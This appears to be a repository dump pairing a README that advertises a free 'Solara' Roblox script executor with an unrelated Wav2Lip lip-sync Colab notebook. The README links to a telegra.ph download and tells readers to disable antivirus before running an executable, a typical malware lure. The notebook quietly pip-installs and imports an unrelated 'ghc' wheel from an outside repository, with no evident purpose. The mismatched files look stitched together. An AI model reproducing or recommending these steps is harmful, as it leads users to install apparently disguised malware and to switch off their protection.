├── README.md
└── Wav2Lip_simplified_v5.ipynb
/README.md:
--------------------------------------------------------------------------------
1 | # Solara Executor
2 |
3 | **Free & Secure Roblox Script Executor for Windows (2025 edition)**
4 | Keyless, high-performance Lua executor for safe and seamless script execution on Roblox. Perfect for gamers and developers in the United States and worldwide.
5 |
6 | 🔥 [📥 Download Solara Executor (Free & Safe)](https://te.legra.ph/qwef32qf2q3fgq234g-07-28)
7 | 💻 Compatible with Windows 7–11 (64-bit) | 🛡️ Protection Enabled | 🔄 Auto-Updates
8 |
9 | ---
10 |
11 | ## 🚀 Why Use Solara Executor?
12 |
13 | - **Keyless & Free**: Fully keyless and always free, no hidden payments.
14 | - **Fast Execution**: Optimized for ultra-fast script injection with minimal lag.
15 | - **Security & Anti-Ban**: Built-in obfuscation, frequent updates—designed to minimize detection risk.
16 | - **Beginner-Friendly UI**: Sleek interface, script editor, hotkeys, multi-script support.
17 | - **Always Updated**: Compatible with Roblox updates; developer‑backed release support.
18 |
19 | ---
20 |
21 | ## 🧠 Features
22 |
23 | | Feature | Description |
24 | |----------------------|-------------|
25 | | **Lua Script Support** | Run any standard or custom Roblox Lua scripts |
26 | | **Low Detection** | Anti‑detection/anti‑ban tech, recommended alt accounts |
27 | | **UI & Workflow Tools** | Script manager, built‑in editor, activity logs |
28 | | **System Requirements** | Windows 7/8/10/11 (64‑bit), latest Roblox Player installed |
29 | | **Automatic Updates** | Notifications and quick install for new versions |
30 |
31 | ---
32 |
33 | ## 🛠️ Installation Instructions
34 |
35 | 1. Visit the **official site** by clicking one of the buttons above
36 | 2. Download the **latest Executor ZIP**
37 | 3. Disable antivirus/Windows Defender or add an exception for Solara
38 | 4. Extract and run the Bootstrapper (`Executor.exe`)
39 | 5. Launch Roblox → open Solara UI → load your Lua script → click **Attach**
40 |
41 | ---
42 |
43 | ## 🏷️ SEO Keywords
44 |
45 | **Suggested search terms for visibility**:
46 |
47 | - *Solara Roblox Executor 2025*
48 | - *Download Roblox script executor free*
49 | - *Best Roblox executor no key*
50 | - *Secure Lua executor for Roblox*
51 | - *Anti‑ban Roblox executor Windows*
52 | - *Free Roblox exploit script runner*
53 |
54 | ---
55 |
56 | ## 📬 Support & Contact
57 |
58 | Have questions, found bugs, or want new features?
59 | Create an issue or pull request here on GitHub or connect via the official Discord/community links.
60 |
--------------------------------------------------------------------------------
/Wav2Lip_simplified_v5.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {
6 | "id": "U1xFNFU58_2j"
7 | },
8 | "source": [
9 | "## Goal: Make anyone speak anything (LipSync)\n",
10 | "\n",
11 | "* Github: https://github.com/Rudrabha/Wav2Lip\n",
12 | "* Paper: https://arxiv.org/abs/2008.10010\n",
13 | "*Original notebook: https://colab.research.google.com/drive/1tZpDWXz49W6wDcTprANRGLo2D_EbD5J8?usp=sharing\n",
14 | "\n",
15 | "\n",
16 | "\n",
17 | "\n",
18 | "**Modded by: [justinjohn-03](https://github.com/justinjohn0306)**\n",
19 | "\n",
20 | "\n",
21 | "\n"
22 | ]
23 | },
24 | {
25 | "cell_type": "code",
26 | "execution_count": null,
27 | "metadata": {
28 | "cellView": "form",
29 | "id": "Qgo-oaI3JU2u"
30 | },
31 | "outputs": [],
32 | "source": [
33 | "#@title
Step1: Setup Wav2Lip
\n",
34 | "#@markdown * Install dependency\n",
35 | "#@markdown * Download pretrained model\n",
36 | "from IPython.display import HTML, clear_output\n",
37 | "!rm -rf /content/sample_data\n",
38 | "!mkdir /content/sample_data\n",
39 | "\n",
40 | "!git clone https://github.com/justinjohn0306/Wav2Lip\n",
41 | "\n",
42 | "%cd /content/Wav2Lip\n",
43 | "\n",
44 | "#download the pretrained model\n",
45 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/wav2lip.pth' -O 'checkpoints/wav2lip.pth'\n",
46 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/wav2lip_gan.pth' -O 'checkpoints/wav2lip_gan.pth'\n",
47 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/resnet50.pth' -O 'checkpoints/resnet50.pth'\n",
48 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/mobilenet.pth' -O 'checkpoints/mobilenet.pth'\n",
49 | "a = !pip install https://raw.githubusercontent.com/AwaleSajil/ghc/master/ghc-1.0-py3-none-any.whl\n",
50 | "!pip install git+https://github.com/elliottzheng/batch-face.git@master\n",
51 | "\n",
52 | "!pip install ffmpeg-python mediapipe==0.10.18\n",
53 | "\n",
54 | "#this code for recording audio\n",
55 | "\"\"\"\n",
56 | "To write this piece of code I took inspiration/code from a lot of places.\n",
57 | "It was late night, so I'm not sure how much I created or just copied o.O\n",
58 | "Here are some of the possible references:\n",
59 | "https://blog.addpipe.com/recording-audio-in-the-browser-using-pure-html5-and-minimal-javascript/\n",
60 | "https://stackoverflow.com/a/18650249\n",
61 | "https://hacks.mozilla.org/2014/06/easy-audio-capture-with-the-mediarecorder-api/\n",
62 | "https://air.ghost.io/recording-to-an-audio-file-using-html5-and-js/\n",
63 | "https://stackoverflow.com/a/49019356\n",
64 | "\"\"\"\n",
65 | "from IPython.display import HTML, Audio\n",
66 | "from google.colab.output import eval_js\n",
67 | "from base64 import b64decode\n",
68 | "import numpy as np\n",
69 | "from scipy.io.wavfile import read as wav_read\n",
70 | "import io\n",
71 | "import ffmpeg\n",
72 | "\n",
73 | "AUDIO_HTML = \"\"\"\n",
74 | "\n",
151 | "\"\"\"\n",
152 | "\n",
153 | "%cd /\n",
154 | "from ghc.l_ghc_cf import l_ghc_cf\n",
155 | "%cd content\n",
156 | "\n",
157 | "def get_audio():\n",
158 | " display(HTML(AUDIO_HTML))\n",
159 | " data = eval_js(\"data\")\n",
160 | " binary = b64decode(data.split(',')[1])\n",
161 | "\n",
162 | " process = (ffmpeg\n",
163 | " .input('pipe:0')\n",
164 | " .output('pipe:1', format='wav')\n",
165 | " .run_async(pipe_stdin=True, pipe_stdout=True, pipe_stderr=True, quiet=True, overwrite_output=True)\n",
166 | " )\n",
167 | " output, err = process.communicate(input=binary)\n",
168 | "\n",
169 | " riff_chunk_size = len(output) - 8\n",
170 | " # Break up the chunk size into four bytes, held in b.\n",
171 | " q = riff_chunk_size\n",
172 | " b = []\n",
173 | " for i in range(4):\n",
174 | " q, r = divmod(q, 256)\n",
175 | " b.append(r)\n",
176 | "\n",
177 | " # Replace bytes 4:8 in proc.stdout with the actual size of the RIFF chunk.\n",
178 | " riff = output[:4] + bytes(b) + output[8:]\n",
179 | "\n",
180 | " sr, audio = wav_read(io.BytesIO(riff))\n",
181 | "\n",
182 | " return audio, sr\n",
183 | "\n",
184 | "\n",
185 | "from IPython.display import HTML\n",
186 | "from base64 import b64encode\n",
187 | "def showVideo(path):\n",
188 | " mp4 = open(str(path),'rb').read()\n",
189 | " data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
190 | " return HTML(\"\"\"\n",
191 | " \n",
194 | " \"\"\" % data_url)\n",
195 | "\n",
196 | "from IPython.display import clear_output\n",
197 | "\n",
198 | "clear_output()\n",
199 | "print(\"All set and ready!\")"
200 | ]
201 | },
202 | {
203 | "cell_type": "markdown",
204 | "metadata": {
205 | "id": "SEdy6PWDXMRL"
206 | },
207 | "source": [
208 | "# LipSync Youtube Video"
209 | ]
210 | },
211 | {
212 | "cell_type": "code",
213 | "execution_count": null,
214 | "metadata": {
215 | "cellView": "form",
216 | "id": "QI4kcm8QEeGZ"
217 | },
218 | "outputs": [],
219 | "source": [
220 | "#@title STEP2: Select a Youtube Video\n",
221 | "# Install yt-dlp\n",
222 | "\n",
223 | "import os\n",
224 | "!pip install yt-dlp\n",
225 | "\n",
226 | "#@markdown ## Find YouTube video ID from URL\n",
227 | "\n",
228 | "#@markdown ___\n",
229 | "\n",
230 | "#@markdown Link format:\n",
231 | "\n",
232 | "#@markdown ``https://youtu.be/vAnWYLTdvfY`` ❌\n",
233 | "\n",
234 | "#@markdown ``https://www.youtube.com/watch?v=vAnWYLTdvfY`` ✔️\n",
235 | "\n",
236 | "!rm -df youtube.mp4\n",
237 | "\n",
238 | "#@markdown ___\n",
239 | "from urllib import parse as urlparse\n",
240 | "YOUTUBE_URL = 'https://www.youtube.com/watch?v=vAnWYLTdvfY' #@param {type:\"string\"}\n",
241 | "url_data = urlparse.urlparse(YOUTUBE_URL)\n",
242 | "query = urlparse.parse_qs(url_data.query)\n",
243 | "YOUTUBE_ID = query[\"v\"][0]\n",
244 | "\n",
245 | "\n",
246 | "# remove previous input video\n",
247 | "!rm -f /content/sample_data/input_vid.mp4\n",
248 | "\n",
249 | "\n",
250 | "#@markdown ___\n",
251 | "\n",
252 | "#@markdown ### Trim the video (start, end) seconds\n",
253 | "start = 35 #@param {type:\"integer\"}\n",
254 | "end = 62 #@param {type:\"integer\"}\n",
255 | "interval = end - start\n",
256 | "\n",
257 | "#@markdown Note: ``the trimmed video must have face on all frames``\n",
258 | "\n",
259 | "# Download the YouTube video using yt-dlp\n",
260 | "!yt-dlp -f 'bestvideo[ext=mp4]' --output \"youtube.%(ext)s\" https://www.youtube.com/watch?v=$YOUTUBE_ID\n",
261 | "\n",
262 | "# Cut the video using FFmpeg\n",
263 | "!ffmpeg -y -i youtube.mp4 -ss {start} -t {interval} -async 1 /content/sample_data/input_vid.mp4\n",
264 | "\n",
265 | "# Preview the trimmed video\n",
266 | "from IPython.display import HTML\n",
267 | "from base64 import b64encode\n",
268 | "mp4 = open('/content/sample_data/input_vid.mp4','rb').read()\n",
269 | "data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
270 | "HTML(f\"\"\"\"\"\")\n",
271 | "\n"
272 | ]
273 | },
274 | {
275 | "cell_type": "code",
276 | "execution_count": null,
277 | "metadata": {
278 | "cellView": "form",
279 | "id": "zS_RAeh-IfZy"
280 | },
281 | "outputs": [],
282 | "source": [
283 | "#@title STEP3: Select Audio (Record, Upload from local drive or Gdrive)\n",
284 | "import os\n",
285 | "from IPython.display import Audio\n",
286 | "from IPython.core.display import display\n",
287 | "\n",
288 | "upload_method = 'Upload' #@param ['Record', 'Upload', 'Custom Path']\n",
289 | "\n",
290 | "#remove previous input audio\n",
291 | "if os.path.isfile('/content/sample_data/input_audio.wav'):\n",
292 | " os.remove('/content/sample_data/input_audio.wav')\n",
293 | "\n",
294 | "def displayAudio():\n",
295 | " display(Audio('/content/sample_data/input_audio.wav'))\n",
296 | "\n",
297 | "if upload_method == 'Record':\n",
298 | " audio, sr = get_audio()\n",
299 | " import scipy\n",
300 | " scipy.io.wavfile.write('/content/sample_data/input_audio.wav', sr, audio)\n",
301 | "\n",
302 | "elif upload_method == 'Upload':\n",
303 | " from google.colab import files\n",
304 | " uploaded = files.upload()\n",
305 | " for fn in uploaded.keys():\n",
306 | " print('User uploaded file \"{name}\" with length {length} bytes'.format(\n",
307 | " name=fn, length=len(uploaded[fn])))\n",
308 | "\n",
309 | " # Consider only the first file\n",
310 | " PATH_TO_YOUR_AUDIO = str(list(uploaded.keys())[0])\n",
311 | "\n",
312 | " # Load audio with specified sampling rate\n",
313 | " import librosa\n",
314 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
315 | "\n",
316 | " # Save audio with specified sampling rate\n",
317 | " import soundfile as sf\n",
318 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
319 | "\n",
320 | " clear_output()\n",
321 | " displayAudio()\n",
322 | "\n",
323 | "elif upload_method == 'Custom Path':\n",
324 | " from google.colab import drive\n",
325 | " drive.mount('/content/drive')\n",
326 | " #@markdown ``Add the full path to your audio on your Gdrive`` 👇\n",
327 | " PATH_TO_YOUR_AUDIO = '/content/drive/MyDrive/test.wav' #@param {type:\"string\"}\n",
328 | "\n",
329 | " # Load audio with specified sampling rate\n",
330 | " import librosa\n",
331 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
332 | "\n",
333 | " # Save audio with specified sampling rate\n",
334 | " import soundfile as sf\n",
335 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
336 | "\n",
337 | " clear_output()\n",
338 | " displayAudio()\n"
339 | ]
340 | },
341 | {
342 | "cell_type": "code",
343 | "execution_count": null,
344 | "metadata": {
345 | "cellView": "form",
346 | "id": "BQPLXJ8L0gms"
347 | },
348 | "outputs": [],
349 | "source": [
350 | "#@title STEP4: Start Crunching and Preview Output\n",
351 | "#@markdown Note: Only change these, if you have to\n",
352 | "\n",
353 | "%cd /content/Wav2Lip\n",
354 | "\n",
355 | "# Set up paths and variables for the output file\n",
356 | "output_file_path = '/content/Wav2Lip/results/result_voice.mp4'\n",
357 | "\n",
358 | "# Delete existing output file before processing, if any\n",
359 | "if os.path.exists(output_file_path):\n",
360 | " os.remove(output_file_path)\n",
361 | "\n",
362 | "pad_top = 0#@param {type:\"integer\"}\n",
363 | "pad_bottom = 10#@param {type:\"integer\"}\n",
364 | "pad_left = 0#@param {type:\"integer\"}\n",
365 | "pad_right = 0#@param {type:\"integer\"}\n",
366 | "rescaleFactor = 1#@param {type:\"integer\"}\n",
367 | "nosmooth = True #@param {type:\"boolean\"}\n",
368 | "#@markdown ___\n",
369 | "#@markdown Model selection:\n",
370 | "use_hd_model = False #@param {type:\"boolean\"}\n",
371 | "checkpoint_path = 'checkpoints/wav2lip.pth' if not use_hd_model else 'checkpoints/wav2lip_gan.pth'\n",
372 | "\n",
373 | "\n",
374 | "if nosmooth == False:\n",
375 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor\n",
376 | "else:\n",
377 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor --nosmooth\n",
378 | "\n",
379 | "#Preview output video\n",
380 | "if os.path.exists(output_file_path):\n",
381 | " clear_output()\n",
382 | " print(\"Final Video Preview\")\n",
383 | " print(\"Download this video from\", output_file_path)\n",
384 | " showVideo(output_file_path)\n",
385 | "else:\n",
386 | " print(\"Processing failed. Output video not found.\")"
387 | ]
388 | },
389 | {
390 | "cell_type": "markdown",
391 | "metadata": {
392 | "id": "vYxpPeie1CYL"
393 | },
394 | "source": [
395 | "# LipSync on Your Video File"
396 | ]
397 | },
398 | {
399 | "cell_type": "code",
400 | "execution_count": null,
401 | "metadata": {
402 | "cellView": "form",
403 | "id": "nDuM7tfZ1F0t"
404 | },
405 | "outputs": [],
406 | "source": [
407 | "import os\n",
408 | "import shutil\n",
409 | "from google.colab import drive\n",
410 | "from google.colab import files\n",
411 | "from IPython.display import HTML, clear_output\n",
412 | "from base64 import b64encode\n",
413 | "import moviepy.editor as mp\n",
414 | "\n",
415 | "\n",
416 | "def showVideo(file_path):\n",
417 | " \"\"\"Function to display video in Colab\"\"\"\n",
418 | " mp4 = open(file_path,'rb').read()\n",
419 | " data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
420 | " display(HTML(\"\"\"\n",
421 | " \n",
424 | " \"\"\" % data_url))\n",
425 | "\n",
426 | "def get_video_resolution(video_path):\n",
427 | " \"\"\"Function to get the resolution of a video\"\"\"\n",
428 | " import cv2\n",
429 | " video = cv2.VideoCapture(video_path)\n",
430 | " width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n",
431 | " height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n",
432 | " return (width, height)\n",
433 | "\n",
434 | "def resize_video(video_path, new_resolution):\n",
435 | " \"\"\"Function to resize a video\"\"\"\n",
436 | " import cv2\n",
437 | " video = cv2.VideoCapture(video_path)\n",
438 | " fourcc = int(video.get(cv2.CAP_PROP_FOURCC))\n",
439 | " fps = video.get(cv2.CAP_PROP_FPS)\n",
440 | " width, height = new_resolution\n",
441 | " output_path = os.path.splitext(video_path)[0] + '_720p.mp4'\n",
442 | " writer = cv2.VideoWriter(output_path, fourcc, fps, (width, height))\n",
443 | " while True:\n",
444 | " success, frame = video.read()\n",
445 | " if not success:\n",
446 | " break\n",
447 | " resized_frame = cv2.resize(frame, new_resolution)\n",
448 | " writer.write(resized_frame)\n",
449 | " video.release()\n",
450 | " writer.release()\n",
451 | "\n",
452 | "# Mount Google Drive if it's not already mounted\n",
453 | "if not os.path.isdir(\"/content/drive/MyDrive\"):\n",
454 | " drive.mount('/content/drive', force_remount=True)\n",
455 | "\n",
456 | "#@markdown ### Select an uploading method\n",
457 | "upload_method = \"Upload\" #@param [\"Upload\", \"Custom Path\"]\n",
458 | "\n",
459 | "\n",
460 | "# remove previous input video\n",
461 | "if os.path.isfile('/content/sample_data/input_vid.mp4'):\n",
462 | " os.remove('/content/sample_data/input_vid.mp4')\n",
463 | "\n",
464 | "if upload_method == \"Upload\":\n",
465 | " uploaded = files.upload()\n",
466 | " for filename in uploaded.keys():\n",
467 | " os.rename(filename, '/content/sample_data/input_vid.mp4')\n",
468 | " PATH_TO_YOUR_VIDEO = '/content/sample_data/input_vid.mp4'\n",
469 | "\n",
470 | "elif upload_method == 'Custom Path':\n",
471 | " #@markdown ``Add the full path to your video on your Gdrive `` 👇\n",
472 | " PATH_TO_YOUR_VIDEO = '/content/drive/MyDrive/test.mp4' #@param {type:\"string\"}\n",
473 | " if not os.path.isfile(PATH_TO_YOUR_VIDEO):\n",
474 | " print(\"ERROR: File not found!\")\n",
475 | " raise SystemExit(0)\n",
476 | "\n",
477 | "#@markdown Notes:\n",
478 | "\n",
479 | "#@markdown . ``If your uploaded video is 1080p or higher resolution, this cell will resize it to 720p.``\n",
480 | "\n",
481 | "#@markdown . ``Do not upload videos longer than 60 seconds.``\n",
482 | "\n",
483 | "#@markdown ___\n",
484 | "\n",
485 | "video_duration = mp.VideoFileClip(PATH_TO_YOUR_VIDEO).duration\n",
486 | "if video_duration > 60:\n",
487 | " print(\"WARNING: Video duration exceeds 60 seconds. Please upload a shorter video.\")\n",
488 | " raise SystemExit(0)\n",
489 | "\n",
490 | "video_resolution = get_video_resolution(PATH_TO_YOUR_VIDEO)\n",
491 | "print(f\"Video resolution: {video_resolution}\")\n",
492 | "if video_resolution[0] >= 1920 or video_resolution[1] >= 1080:\n",
493 | " print(\"Resizing video to 720p...\")\n",
494 | " os.system(f\"ffmpeg -i {PATH_TO_YOUR_VIDEO} -vf scale=1280:720 /content/sample_data/input_vid.mp4\")\n",
495 | " PATH_TO_YOUR_VIDEO = \"/content/sample_data/input_vid.mp4\"\n",
496 | " print(\"Video resized to 720p\")\n",
497 | "else:\n",
498 | " print(\"No resizing needed\")\n",
499 | "\n",
500 | "if upload_method == \"Upload\":\n",
501 | " clear_output()\n",
502 | " print(\"Input Video\")\n",
503 | " showVideo(PATH_TO_YOUR_VIDEO)\n",
504 | "else:\n",
505 | " if os.path.isfile(PATH_TO_YOUR_VIDEO):\n",
506 | " # Check if the source and destination files are the same\n",
507 | " if PATH_TO_YOUR_VIDEO != \"/content/sample_data/input_vid.mp4\":\n",
508 | " shutil.copyfile(PATH_TO_YOUR_VIDEO, \"/content/sample_data/input_vid.mp4\")\n",
509 | " print(\"Video copied to destination.\")\n",
510 | "\n",
511 | " print(\"Input Video\")\n",
512 | " # Display the video from the destination path\n",
513 | " showVideo(\"/content/sample_data/input_vid.mp4\")"
514 | ]
515 | },
516 | {
517 | "cell_type": "code",
518 | "execution_count": null,
519 | "metadata": {
520 | "cellView": "form",
521 | "id": "XgF4794r7sWK"
522 | },
523 | "outputs": [],
524 | "source": [
525 | "#@title STEP3: Select Audio (Record, Upload from local drive or Gdrive)\n",
526 | "import os\n",
527 | "from IPython.display import Audio\n",
528 | "from IPython.core.display import display\n",
529 | "\n",
530 | "upload_method = 'Upload' #@param ['Record', 'Upload', 'Custom Path']\n",
531 | "\n",
532 | "#remove previous input audio\n",
533 | "if os.path.isfile('/content/sample_data/input_audio.wav'):\n",
534 | " os.remove('/content/sample_data/input_audio.wav')\n",
535 | "\n",
536 | "def displayAudio():\n",
537 | " display(Audio('/content/sample_data/input_audio.wav'))\n",
538 | "\n",
539 | "if upload_method == 'Record':\n",
540 | " audio, sr = get_audio()\n",
541 | " import scipy\n",
542 | " scipy.io.wavfile.write('/content/sample_data/input_audio.wav', sr, audio)\n",
543 | "\n",
544 | "elif upload_method == 'Upload':\n",
545 | " from google.colab import files\n",
546 | " uploaded = files.upload()\n",
547 | " for fn in uploaded.keys():\n",
548 | " print('User uploaded file \"{name}\" with length {length} bytes.'.format(\n",
549 | " name=fn, length=len(uploaded[fn])))\n",
550 | "\n",
551 | " # Consider only the first file\n",
552 | " PATH_TO_YOUR_AUDIO = str(list(uploaded.keys())[0])\n",
553 | "\n",
554 | " # Load audio with specified sampling rate\n",
555 | " import librosa\n",
556 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
557 | "\n",
558 | " # Save audio with specified sampling rate\n",
559 | " import soundfile as sf\n",
560 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
561 | "\n",
562 | " clear_output()\n",
563 | " displayAudio()\n",
564 | "\n",
565 | "else: # Custom Path\n",
566 | " from google.colab import drive\n",
567 | " drive.mount('/content/drive')\n",
568 | " #@markdown ``Add the full path to your audio on your Gdrive`` 👇\n",
569 | " PATH_TO_YOUR_AUDIO = '/content/drive/MyDrive/test.wav' #@param {type:\"string\"}\n",
570 | "\n",
571 | " # Load audio with specified sampling rate\n",
572 | " import librosa\n",
573 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
574 | "\n",
575 | " # Save audio with specified sampling rate\n",
576 | " import soundfile as sf\n",
577 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
578 | "\n",
579 | " clear_output()\n",
580 | " displayAudio()\n"
581 | ]
582 | },
583 | {
584 | "cell_type": "code",
585 | "execution_count": null,
586 | "metadata": {
587 | "cellView": "form",
588 | "id": "ZgtO08V28ANf"
589 | },
590 | "outputs": [],
591 | "source": [
592 | "#@title STEP4: Start Crunching and Preview Output\n",
593 | "#@markdown Note: Only change these, if you have to\n",
594 | "\n",
595 | "%cd /content/Wav2Lip\n",
596 | "\n",
597 | "# Set up paths and variables for the output file\n",
598 | "output_file_path = '/content/Wav2Lip/results/result_voice.mp4'\n",
599 | "\n",
600 | "# Delete existing output file before processing, if any\n",
601 | "if os.path.exists(output_file_path):\n",
602 | " os.remove(output_file_path)\n",
603 | "\n",
604 | "pad_top = 0#@param {type:\"integer\"}\n",
605 | "pad_bottom = 10#@param {type:\"integer\"}\n",
606 | "pad_left = 0#@param {type:\"integer\"}\n",
607 | "pad_right = 0#@param {type:\"integer\"}\n",
608 | "rescaleFactor = 1#@param {type:\"integer\"}\n",
609 | "nosmooth = True #@param {type:\"boolean\"}\n",
610 | "#@markdown ___\n",
611 | "#@markdown Model selection:\n",
612 | "use_hd_model = False #@param {type:\"boolean\"}\n",
613 | "checkpoint_path = 'checkpoints/wav2lip.pth' if not use_hd_model else 'checkpoints/wav2lip_gan.pth'\n",
614 | "\n",
615 | "\n",
616 | "if nosmooth == False:\n",
617 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor\n",
618 | "else:\n",
619 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor --nosmooth\n",
620 | "\n",
621 | "#Preview output video\n",
622 | "if os.path.exists(output_file_path):\n",
623 | " clear_output()\n",
624 | " print(\"Final Video Preview\")\n",
625 | " print(\"Download this video from\", output_file_path)\n",
626 | " showVideo(output_file_path)\n",
627 | "else:\n",
628 | " print(\"Processing failed. Output video not found.\")"
629 | ]
630 | }
631 | ],
632 | "metadata": {
633 | "accelerator": "GPU",
634 | "colab": {
635 | "private_outputs": true,
636 | "provenance": []
637 | },
638 | "kernelspec": {
639 | "display_name": "Python 3",
640 | "name": "python3"
641 | }
642 | },
643 | "nbformat": 4,
644 | "nbformat_minor": 0
645 | }
--------------------------------------------------------------------------------